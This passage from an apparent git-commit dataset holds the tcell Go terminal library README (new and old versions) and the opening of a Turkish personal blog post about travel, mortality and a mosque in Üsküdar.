(http:\/\/2.bp.blogspot.com\/-fWvW5opT0es\/VhIdItdKqJI\/AAAAAAAAATE\/7Ojc0L1SpB0\/s1600\/Screen%2BShot%2B2015-10-04%2Bat%2B11.47.13%2BPM.png[screenshot])\n* https:\/\/github.com\/gdamore\/gomatrix[gomatrix] - converted from Termbox\n* https:\/\/github.com\/zyedidia\/micro\/[micro] - lightweight text editor with syntax-highlighting and themes\n* https:\/\/github.com\/viktomas\/godu[godu] - simple golang utility helping to discover large files\/folders.\n* https:\/\/github.com\/rivo\/tview[tview] - rich interactive widgets for terminal UIs\n* https:\/\/github.com\/marcusolsson\/tui-go[tui-go] - UI library for terminal apps (_deprecated_)\n* https:\/\/github.com\/rgm3\/gomandelbrot[gomandelbrot] - Mandelbrot!\n* https:\/\/github.com\/senorprogrammer\/wtf[WTF]- Personal information dashboard for your terminal\n* https:\/\/github.com\/browsh-org\/browsh[browsh] - A fully-modern text-based browser, rendering to TTY and browsers (https:\/\/www.youtube.com\/watch?v=HZq86XfBoRo[video])\n* https:\/\/github.com\/sachaos\/go-life[go-life] - Conway's Game of Life.\n* https:\/\/github.com\/gcla\/gowid[gowid] - compositional widgets for terminal UIs, inspired by urwid\n* https:\/\/termshark.io[termshark] - a terminal UI for tshark, inspired by Wireshark, built on gowid\n* https:\/\/github.com\/MichaelS11\/go-tetris[go-tetris] - Go Tetris with AI option\n* https:\/\/github.com\/junegunn\/fzf[fzf] - A command-line fuzzy finder\n* https:\/\/github.com\/esimov\/ascii-fluid[ascii-fluid] - A terminal based ASCII fluid simulation controlled by webcam\n* https:\/\/gitlab.com\/tslocum\/cbind[cbind] - Provides key event encoding, decoding and handling\n* https:\/\/github.com\/spinzed\/tpong[tpong] - The old-school Pong remade in terminal\n\n## Pure Go Terminfo Database\n\n_Tcell_ includes a full parser and expander for terminfo capability strings,\nso that it can avoid hard coding escape strings for formatting. It also favors\nportability, and includes support for all POSIX systems.\n\nThe database is also flexible & extensible, and can modified by either running\na program to build the entire database, or an entry for just a single terminal.\n\n## More Portable\n\n_Tcell_ is portable to a wide variety of systems.\n_Tcell_ is believed\nto work with all of the systems officially supported by golang with\nthe exception of nacl (which lacks any kind of a terminal interface).\n(Plan9 is not supported by _Tcell_, but it is experimental status only\nin golang.) For all of these systems *except Solaris\/illumos*, _Tcell_\nis pure Go, with no need for CGO.\n\n## No Async IO\n\n_Tcell_ is able to operate without requiring `SIGIO` signals (unlike _termbox_),\nor asynchronous I\/O, and can instead use standard Go file\nobjects and Go routines.\nThis means it should be safe, especially for\nuse with programs that use exec, or otherwise need to manipulate the\ntty streams.\nThis model is also much closer to idiomatic Go, leading\nto fewer surprises.\n\n## Rich Unicode & non-Unicode support\n\n_Tcell_ includes enhanced support for Unicode, including wide characters and\ncombining characters, provided your terminal can support them.\nNote that\nWindows terminals generally don't support the full Unicode repertoire.\n\nIt will also convert to and from Unicode locales, so that the program\ncan work with UTF-8 internally, and get reasonable output in other locales.\n_Tcell_ tries hard to convert to native characters on both input and output, and\non output _Tcell_ even makes use of the alternate character set to facilitate\ndrawing certain characters.\n\n## More Function Keys\n\n_Tcell_ also has richer support for a larger number of special keys that some terminals can send.\n\n## Better Color Handling\n\n_Tcell_ will respect your terminal's color space as specified within your terminfo\nentries, so that for example attempts to emit color sequences on VT100 terminals\nwon't result in unintended consequences.\n\nIn Windows mode, _Tcell_ supports 16 colors, bold, dim, and reverse,\ninstead of just termbox's 8 colors with reverse. (Note that there is some\nconflation with bold\/dim and colors.)\n\n_Tcell_ maps 16 colors down to 8, for terminals that need it.\n(The upper 8 colors are just brighter versions of the lower 8.)\n\n## Better Mouse Support\n\n_Tcell_ supports enhanced mouse tracking mode, so your application can receive\nregular mouse motion events, and wheel events, if your terminal supports it.\n\n## _Termbox_ Compatibility\n\nA compatibility layer for _termbox_ is provided in the `compat` directory.\nTo use it, try importing `github.com\/gdamore\/tcell\/termbox`\ninstead. Most _termbox-go_ programs will probably work without further\nmodification.\n\n## Working With Unicode\n\nInternally Tcell uses UTF-8, just like Go.\nHowever, Tcell understands how to\nconvert to and from other character sets, using the capabilities of\nthe `golang.org\/x\/text\/encoding packages`.\nYour application must supply\nthem, as the full set of the most common ones bloats the program by about 2MB.\nIf you're lazy, and want them all anyway, see the `encoding` sub-directory.\n\n## Wide & Combining Characters\n\nThe `SetContent()` API takes a primary rune, and an optional list of combining runes.\nIf any of the runes is a wide (East Asian) rune occupying two cells,\nthen the library will skip output from the following cell, but care must be\ntaken in the application to avoid explicitly attempting to set content in the\nnext cell, otherwise the results are undefined. (Normally wide character\nis displayed, and the other character is not; do not depend on that behavior.)\n\nExperience has shown that the vanilla Windows 8 console application does not\nsupport any of these characters properly, but at least some options like\n_ConEmu_ do support Wide characters.\n\n## Colors\n\n_Tcell_ assumes the ANSI\/XTerm color model, including the 256 color map that\nXTerm uses when it supports 256 colors. The terminfo guidance will be\nhonored, with respect to the number of colors supported. Also, only\nterminals which expose ANSI style `setaf` and `setab` will support color;\nif you have a color terminal that only has `setf` and `setb`, please let me\nknow; it wouldn't be hard to add that if there is need.\n\n## 24-bit Color\n\n_Tcell_ _supports true color_! (That is, if your terminal can support it,\n_Tcell_ can accurately display 24-bit color.)\n\nTo use 24-bit color, you need to use a terminal that supports it. Modern\nxterm and similar teminal emulators can support this. As terminfo lacks any\nway to describe this capability, we fabricate the capability for\nterminals with names ending in `*-truecolor`. The stock distribution ships\nwith a database that defines `xterm-truecolor`.\nTo try it out, set your\n`TERM` variable to `xterm-truecolor`.\n\nWhen using TrueColor, programs will display the colors that the programmer\nintended, overriding any \"`themes`\" you may have set in your terminal\nemulator. (For some cases, accurate color fidelity is more important\nthan respecting themes. For other cases, such as typical text apps that\nonly use a few colors, its more desirable to respect the themes that\nthe user has established.)\n\nIf you find this undesirable, you can either use a `TERM` variable\nthat lacks the `TRUECOLOR` setting, or set `TCELL_TRUECOLOR=disable` in your\nenvironment.\n\n## Performance\n\nReasonable attempts have been made to minimize sending data to terminals,\navoiding repeated sequences or drawing the same cell on refresh updates.\n\n## Terminfo\n\n(Not relevent for Windows users.)\n\nThe Terminfo implementation operates with two forms of database. The first\nis the built-in go database, which contains a number of real database entries\nthat are compiled into the program directly. This should minimize calling\nout to database file searches.\n\nThe second is in the form of JSON files, that contain the same information,\nwhich can be located either by the `$TCELLDB` environment file, `$HOME\/.tcelldb`,\nor is located in the Go source directory as `database.json`.\n\nThese files (both the Go and the JSON files) can be generated using the\nmkinfo.go program. If you need to regnerate the entire set for some reason,\nrun the mkdatabase.sh file. The generation uses the infocmp(1) program on\nthe system to collect the necessary information.\n\nThe `mkinfo.go` program can also be used to generate specific database entries\nfor named terminals, in case your favorite terminal is missing. (If you\nfind that this is the case, please let me know and I'll try to add it!)\n\n_Tcell_ requires that the terminal support the `cup` mode of cursor addressing.\nTerminals without absolute cursor addressability are not supported.\nThis is unlikely to be a problem; such terminals have not been mass produced\nsince the early 1970s.\n\n## Mouse Support\n\nMouse support is detected via the `kmous` terminfo variable, however,\nenablement\/disablement and decoding mouse events is done using hard coded\nsequences based on the XTerm X11 model. As of this writing all popular\nterminals with mouse tracking support this model. (Full terminfo support\nis not possible as terminfo sequences are not defined.)\n\nOn Windows, the mouse works normally.\n\nMouse wheel buttons on various terminals are known to work, but the support\nin terminal emulators, as well as support for various buttons and\nlive mouse tracking, varies widely. Modern _xterm_, macOS _Terminal_, and _iTerm_ all work well.\n\n## Testablity\n\nThere is a `SimulationScreen`, that can be used to simulate a real screen\nfor automated testing. The supplied tests do this. The simulation contains\nevent delivery, screen resizing support, and capabilities to inject events\nand examine \"`physical`\" screen contents.\n\n## Platforms\n\n### POSIX (Linux, FreeBSD, macOS, Solaris, etc.)\n\nFor mainstream systems with a suitably well defined system call interface\nto tty settings, everything works using pure Go.\n\nFor the remainder (right now means only Solaris\/illumos) we use POSIX function\ncalls to manage termios, which implies that CGO is required on those platforms.\n\n### Windows\n\nWindows console mode applications are supported. Unfortunately _mintty_\nand other _cygwin_ style applications are not supported.\n\nModern console applications like ConEmu, as well as the Windows 10\nconsole itself, support all the good features (resize, mouse tracking, etc.)\n\nI haven't figured out how to cleanly resolve the dichotomy between cygwin\nstyle termios and the Windows Console API; it seems that perhaps nobody else\nhas either. If anyone has suggestions, let me know! Really, if you're\nusing a Windows application, you should use the native Windows console or a\nfully compatible console implementation.\n\n### Plan9 and Native Client (Nacl)\n\nThe nacl and plan9 platforms won't work, but compilation stubs are supplied\nfor folks that want to include parts of this in software targetting those\nplatforms. The Simulation screen works, but as Tcell doesn't know how to\nallocate a real screen object on those platforms, `NewScreen()` will fail.\n\nIf anyone has wisdom about how to improve support for either of these,\nplease let me know. PRs are especially welcome.\n\n### Commercial Support\n\n_Tcell_ is absolutely free, but if you want to obtain commercial, professional support, there are options.\n\n[cols=\"2\",align=\"center\",frame=\"none\", grid=\"none\"]\n|===\n^.^|\nimage:logos\/tidelift.png[100,100]\na|\nhttps:\/\/tidelift.com\/[Tidelift] subscriptions include support for _Tcell_, as well as many other open source packages.\n\n^.^|\nimage:logos\/staysail.png[100,100]\na|\nmailto:info@staysail.tech[Staysail Systems, Inc.] offers direct support, and custom development around _Tcell_ on an hourly basis.\n\n^.^|\nimage:logos\/patreon.png[100,100]\na|I also welcome donations at https:\/\/www.patreon.com\/gedamore\/[Patreon], if you just want to make a contribution.\n|===\n","old_contents":"= tcell\n\n\nimage:https:\/\/img.shields.io\/travis\/gdamore\/tcell.svg?label=linux[Linux Status,link=\"https:\/\/travis-ci.org\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/appveyor\/ci\/gdamore\/tcell.svg?label=windows[Windows Status,link=\"https:\/\/ci.appveyor.com\/project\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/badge\/license-APACHE2-blue.svg[Apache License,link=\"https:\/\/github.com\/gdamore\/tcell\/blob\/master\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/godoc-reference-blue.svg[GoDoc,link=\"https:\/\/godoc.org\/github.com\/gdamore\/tcell\"]\nimage:http:\/\/goreportcard.com\/badge\/gdamore\/tcell[Go Report Card,link=\"http:\/\/goreportcard.com\/report\/gdamore\/tcell\"]\nimage:https:\/\/img.shields.io\/discord\/639503822733180969?label=discord[Discord,link=\"https:\/\/discord.gg\/urTTxDN\"]\nimage:https:\/\/codecov.io\/gh\/gdamore\/tcell\/branch\/master\/graph\/badge.svg[codecov,link=\"https:\/\/codecov.io\/gh\/gdamore\/tcell\"]\n\n[cols=\"2\",grid=\"none\"]\n|===\n|_Tcell_ is a _Go_ package that provides a cell based view for text terminals, like _xterm_.\nIt was inspired by _termbox_, but includes many additional improvements.\na|[.right]\nimage::logos\/tcell.png[float=\"right\"]\n|===\n\n## Examples\n\n* https:\/\/github.com\/gdamore\/proxima5[proxima5] - space shooter (https:\/\/youtu.be\/jNxKTCmY_bQ[video])\n* https:\/\/github.com\/gdamore\/govisor[govisor] - service management UI (http:\/\/2.bp.blogspot.com\/--OsvnfzSNow\/Vf7aqMw3zXI\/AAAAAAAAARo\/uOMtOvw4Sbg\/s1600\/Screen%2BShot%2B2015-09-20%2Bat%2B9.08.41%2BAM.png[screenshot])\n* mouse demo - included mouse test (http:\/\/2.bp.blogspot.com\/-fWvW5opT0es\/VhIdItdKqJI\/AAAAAAAAATE\/7Ojc0L1SpB0\/s1600\/Screen%2BShot%2B2015-10-04%2Bat%2B11.47.13%2BPM.png[screenshot])\n* https:\/\/github.com\/gdamore\/gomatrix[gomatrix] - converted from Termbox\n* https:\/\/github.com\/zyedidia\/micro\/[micro] - lightweight text editor with syntax-highlighting and themes\n* https:\/\/github.com\/viktomas\/godu[godu] - simple golang utility helping to discover large files\/folders.\n* https:\/\/github.com\/rivo\/tview[tview] - rich interactive widgets for terminal UIs\n* https:\/\/github.com\/marcusolsson\/tui-go[tui-go] - UI library for terminal apps (_deprecated_)\n* https:\/\/github.com\/rgm3\/gomandelbrot[gomandelbrot] - Mandelbrot!\n* https:\/\/github.com\/senorprogrammer\/wtf[WTF]- Personal information dashboard for your terminal\n* https:\/\/github.com\/browsh-org\/browsh[browsh] - A fully-modern text-based browser, rendering to TTY and browsers (https:\/\/www.youtube.com\/watch?v=HZq86XfBoRo[video])\n* https:\/\/github.com\/sachaos\/go-life[go-life] - Conway's Game of Life.\n* https:\/\/github.com\/gcla\/gowid[gowid] - compositional widgets for terminal UIs, inspired by urwid\n* https:\/\/termshark.io[termshark] - a terminal UI for tshark, inspired by Wireshark, built on gowid\n* https:\/\/github.com\/MichaelS11\/go-tetris[go-tetris] - Go Tetris with AI option\n* https:\/\/github.com\/junegunn\/fzf[fzf] - A command-line fuzzy finder\n* https:\/\/github.com\/esimov\/ascii-fluid[ascii-fluid] - A terminal based ASCII fluid simulation controlled by webcam\n* https:\/\/gitlab.com\/tslocum\/cbind[cbind] - Provides key event encoding, decoding and handling\n\n## Pure Go Terminfo Database\n\n_Tcell_ includes a full parser and expander for terminfo capability strings,\nso that it can avoid hard coding escape strings for formatting. It also favors\nportability, and includes support for all POSIX systems.\n\nThe database is also flexible & extensible, and can modified by either running\na program to build the entire database, or an entry for just a single terminal.\n\n## More Portable\n\n_Tcell_ is portable to a wide variety of systems.\n_Tcell_ is believed\nto work with all of the systems officially supported by golang with\nthe exception of nacl (which lacks any kind of a terminal interface).\n(Plan9 is not supported by _Tcell_, but it is experimental status only\nin golang.) For all of these systems *except Solaris\/illumos*, _Tcell_\nis pure Go, with no need for CGO.\n\n## No Async IO\n\n_Tcell_ is able to operate without requiring `SIGIO` signals (unlike _termbox_),\nor asynchronous I\/O, and can instead use standard Go file\nobjects and Go routines.\nThis means it should be safe, especially for\nuse with programs that use exec, or otherwise need to manipulate the\ntty streams.\nThis model is also much closer to idiomatic Go, leading\nto fewer surprises.\n\n## Rich Unicode & non-Unicode support\n\n_Tcell_ includes enhanced support for Unicode, including wide characters and\ncombining characters, provided your terminal can support them.\nNote that\nWindows terminals generally don't support the full Unicode repertoire.\n\nIt will also convert to and from Unicode locales, so that the program\ncan work with UTF-8 internally, and get reasonable output in other locales.\n_Tcell_ tries hard to convert to native characters on both input and output, and\non output _Tcell_ even makes use of the alternate character set to facilitate\ndrawing certain characters.\n\n## More Function Keys\n\n_Tcell_ also has richer support for a larger number of special keys that some terminals can send.\n\n## Better Color Handling\n\n_Tcell_ will respect your terminal's color space as specified within your terminfo\nentries, so that for example attempts to emit color sequences on VT100 terminals\nwon't result in unintended consequences.\n\nIn Windows mode, _Tcell_ supports 16 colors, bold, dim, and reverse,\ninstead of just termbox's 8 colors with reverse. (Note that there is some\nconflation with bold\/dim and colors.)\n\n_Tcell_ maps 16 colors down to 8, for terminals that need it.\n(The upper 8 colors are just brighter versions of the lower 8.)\n\n## Better Mouse Support\n\n_Tcell_ supports enhanced mouse tracking mode, so your application can receive\nregular mouse motion events, and wheel events, if your terminal supports it.\n\n## _Termbox_ Compatibility\n\nA compatibility layer for _termbox_ is provided in the `compat` directory.\nTo use it, try importing `github.com\/gdamore\/tcell\/termbox`\ninstead. Most _termbox-go_ programs will probably work without further\nmodification.\n\n## Working With Unicode\n\nInternally Tcell uses UTF-8, just like Go.\nHowever, Tcell understands how to\nconvert to and from other character sets, using the capabilities of\nthe `golang.org\/x\/text\/encoding packages`.\nYour application must supply\nthem, as the full set of the most common ones bloats the program by about 2MB.\nIf you're lazy, and want them all anyway, see the `encoding` sub-directory.\n\n## Wide & Combining Characters\n\nThe `SetContent()` API takes a primary rune, and an optional list of combining runes.\nIf any of the runes is a wide (East Asian) rune occupying two cells,\nthen the library will skip output from the following cell, but care must be\ntaken in the application to avoid explicitly attempting to set content in the\nnext cell, otherwise the results are undefined. (Normally wide character\nis displayed, and the other character is not; do not depend on that behavior.)\n\nExperience has shown that the vanilla Windows 8 console application does not\nsupport any of these characters properly, but at least some options like\n_ConEmu_ do support Wide characters.\n\n## Colors\n\n_Tcell_ assumes the ANSI\/XTerm color model, including the 256 color map that\nXTerm uses when it supports 256 colors. The terminfo guidance will be\nhonored, with respect to the number of colors supported. Also, only\nterminals which expose ANSI style `setaf` and `setab` will support color;\nif you have a color terminal that only has `setf` and `setb`, please let me\nknow; it wouldn't be hard to add that if there is need.\n\n## 24-bit Color\n\n_Tcell_ _supports true color_! (That is, if your terminal can support it,\n_Tcell_ can accurately display 24-bit color.)\n\nTo use 24-bit color, you need to use a terminal that supports it. Modern\nxterm and similar teminal emulators can support this. As terminfo lacks any\nway to describe this capability, we fabricate the capability for\nterminals with names ending in `*-truecolor`. The stock distribution ships\nwith a database that defines `xterm-truecolor`.\nTo try it out, set your\n`TERM` variable to `xterm-truecolor`.\n\nWhen using TrueColor, programs will display the colors that the programmer\nintended, overriding any \"`themes`\" you may have set in your terminal\nemulator. (For some cases, accurate color fidelity is more important\nthan respecting themes. For other cases, such as typical text apps that\nonly use a few colors, its more desirable to respect the themes that\nthe user has established.)\n\nIf you find this undesirable, you can either use a `TERM` variable\nthat lacks the `TRUECOLOR` setting, or set `TCELL_TRUECOLOR=disable` in your\nenvironment.\n\n## Performance\n\nReasonable attempts have been made to minimize sending data to terminals,\navoiding repeated sequences or drawing the same cell on refresh updates.\n\n## Terminfo\n\n(Not relevent for Windows users.)\n\nThe Terminfo implementation operates with two forms of database. The first\nis the built-in go database, which contains a number of real database entries\nthat are compiled into the program directly. This should minimize calling\nout to database file searches.\n\nThe second is in the form of JSON files, that contain the same information,\nwhich can be located either by the `$TCELLDB` environment file, `$HOME\/.tcelldb`,\nor is located in the Go source directory as `database.json`.\n\nThese files (both the Go and the JSON files) can be generated using the\nmkinfo.go program. If you need to regnerate the entire set for some reason,\nrun the mkdatabase.sh file. The generation uses the infocmp(1) program on\nthe system to collect the necessary information.\n\nThe `mkinfo.go` program can also be used to generate specific database entries\nfor named terminals, in case your favorite terminal is missing. (If you\nfind that this is the case, please let me know and I'll try to add it!)\n\n_Tcell_ requires that the terminal support the `cup` mode of cursor addressing.\nTerminals without absolute cursor addressability are not supported.\nThis is unlikely to be a problem; such terminals have not been mass produced\nsince the early 1970s.\n\n## Mouse Support\n\nMouse support is detected via the `kmous` terminfo variable, however,\nenablement\/disablement and decoding mouse events is done using hard coded\nsequences based on the XTerm X11 model. As of this writing all popular\nterminals with mouse tracking support this model. (Full terminfo support\nis not possible as terminfo sequences are not defined.)\n\nOn Windows, the mouse works normally.\n\nMouse wheel buttons on various terminals are known to work, but the support\nin terminal emulators, as well as support for various buttons and\nlive mouse tracking, varies widely. Modern _xterm_, macOS _Terminal_, and _iTerm_ all work well.\n\n## Testablity\n\nThere is a `SimulationScreen`, that can be used to simulate a real screen\nfor automated testing. The supplied tests do this. The simulation contains\nevent delivery, screen resizing support, and capabilities to inject events\nand examine \"`physical`\" screen contents.\n\n## Platforms\n\n### POSIX (Linux, FreeBSD, macOS, Solaris, etc.)\n\nFor mainstream systems with a suitably well defined system call interface\nto tty settings, everything works using pure Go.\n\nFor the remainder (right now means only Solaris\/illumos) we use POSIX function\ncalls to manage termios, which implies that CGO is required on those platforms.\n\n### Windows\n\nWindows console mode applications are supported. Unfortunately _mintty_\nand other _cygwin_ style applications are not supported.\n\nModern console applications like ConEmu, as well as the Windows 10\nconsole itself, support all the good features (resize, mouse tracking, etc.)\n\nI haven't figured out how to cleanly resolve the dichotomy between cygwin\nstyle termios and the Windows Console API; it seems that perhaps nobody else\nhas either. If anyone has suggestions, let me know! Really, if you're\nusing a Windows application, you should use the native Windows console or a\nfully compatible console implementation.\n\n### Plan9 and Native Client (Nacl)\n\nThe nacl and plan9 platforms won't work, but compilation stubs are supplied\nfor folks that want to include parts of this in software targetting those\nplatforms. The Simulation screen works, but as Tcell doesn't know how to\nallocate a real screen object on those platforms, `NewScreen()` will fail.\n\nIf anyone has wisdom about how to improve support for either of these,\nplease let me know. PRs are especially welcome.\n\n### Commercial Support\n\n_Tcell_ is absolutely free, but if you want to obtain commercial, professional support, there are options.\n\n[cols=\"2\",align=\"center\",frame=\"none\", grid=\"none\"]\n|===\n^.^|\nimage:logos\/tidelift.png[100,100]\na|\nhttps:\/\/tidelift.com\/[Tidelift] subscriptions include support for _Tcell_, as well as many other open source packages.\n\n^.^|\nimage:logos\/staysail.png[100,100]\na|\nmailto:info@staysail.tech[Staysail Systems, Inc.] offers direct support, and custom development around _Tcell_ on an hourly basis.\n\n^.^|\nimage:logos\/patreon.png[100,100]\na|I also welcome donations at https:\/\/www.patreon.com\/gedamore\/[Patreon], if you just want to make a contribution.\n|===\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"483fa8425888f764afddec9feb3628942ea96421","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi 